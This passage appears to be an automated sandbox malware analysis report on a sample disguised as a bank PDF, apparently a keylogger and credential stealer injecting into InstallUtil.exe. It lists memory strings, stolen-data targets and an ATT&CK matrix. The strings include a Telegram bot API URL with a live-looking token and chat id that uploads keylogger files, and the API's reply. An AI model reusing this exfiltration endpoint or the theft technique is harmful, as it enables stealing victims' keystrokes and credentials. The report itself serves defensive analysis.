Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 28:27]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:05]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:52]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC- KeyDatalyDLsABf.txt:::user-PC\user\8.46.123.189[02:25:59]<<Program Manager>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:31]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:43]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:29:00]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:58]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751175605.0000000003942000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:57]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDataNuoaXkTB.txt.6.dr | Binary or memory string: [02:25:46]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:19]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:55]<<Program Manager>>e
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:35]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:24]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:13]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:02]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:01]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:12]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2:25:12]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:23]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:54]<<Program Manager:
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\25:59]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :54]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:29]<<Program Manager
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerROxtmLu<L3.S&h
Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:27:11]<<Program Manager>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:27:10]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 03]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:25:57]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:42]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:53]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:57]<<Program Manager
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:40]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:25]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :25:25]<<Program Manager
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:03]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:54]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:11]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:33]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:29]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:20]<<Program Manager>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogram Manager
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:55]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager61712D44/oct
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:34]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:28]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:56]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDication/oct
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:41]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--3]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:59]<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:32]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffset":21,"length":12,"type":"url"}]}}5:31]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:54]<<Program Manager>E
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP6]<<Program Manager>>
            Source: KeyDatayWFuRDZM.txt.6.drBinary or memory string: [02:25:47]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:10]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:55]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:26:19]<<Program Manager>>
            Source: KeyDatayMRUSbUX.txt.6.drBinary or memory string: [02:25:43]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:04]<<Program Manager>>h:kI
            Source: KeyDataIxTZPxTo.txt.6.drBinary or memory string: [02:25:54]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <C:\Windows\SysWOW64\cdosys.dllfghijklmnopqrstuvwxyzates\user-PC-user\25:11]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":502,"from":{"id":7508829218,"is_bot":true,"first_name":"dacloud","username":"gyyfgsugwubot"},"chat":{"id":1342702073,"first_name":"Johhny","last_name":"X","username":"Johnnyx777","type":"private"},"date":1741159740,"document":{"file_name":"KeyDataQcOnaJJH.txt","mime_type":"text/plain","file_id":"BQACAgEAAxkDAAIB9mfH_TyLaDFxAnrFUtKLuoJvDutJAAK8BAACSsJBRmETwPCVsF1aNgQ","file_unique_id":"AgADvAQAAkrCQUY","file_size":396},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--:13]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:28]<<Program Managera}function Fa(a){return a.s===M?a.toJSON():Aa(a)};function Ga(a,b,c){c=void 0===c?K:c;if(null!=a){if(ta&&a instanceof Uint8Array)return b?a:new Uint8Array(a);if(Array.isArray(a)){var d=H(a);if(d&2)return a;if(b&&!(d&64)&&(d&32||0===d))return I(a,d|34),a;a=Ea(a,Ga,d&4?K:c,!0,!1,!0);b=H(a);b&4&&b&2&&Object.freeze(a);return a}a.s===M&&(b=a.h,c=J(b),a=c&2?a:Q(a.constructor,Ha(b,c,!0)));return a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)}
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]753C4C332E53794D3F3B2336264A68]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]<<Program Manager>>s/
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerROxtmLu<L3.S<
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:38]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:48]<<Program Manager>$
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:26]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:37]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:09]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :02]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:36]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:48]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:19]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :25:17]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:27:11]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:28]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, KeyDataNuoaXkTB.txt.6.drBinary or memory string: [02:25:44]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:45]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>F
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:27]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749799651.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:57]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:30]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--15]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 28:57]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, KeyDataIxTZPxTo.txt.6.drBinary or memory string: [02:25:53]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>O
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Queries volume information: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Queries volume information: C:\Users\user\AppData\Roaming\AllData.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
            MITRE ATT&CK Matrix (techniques listed per tactic; a number before a technique is the report's hit count as rendered)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 12 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Virtualization/Sandbox Evasion; 12 Process Injection
            Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
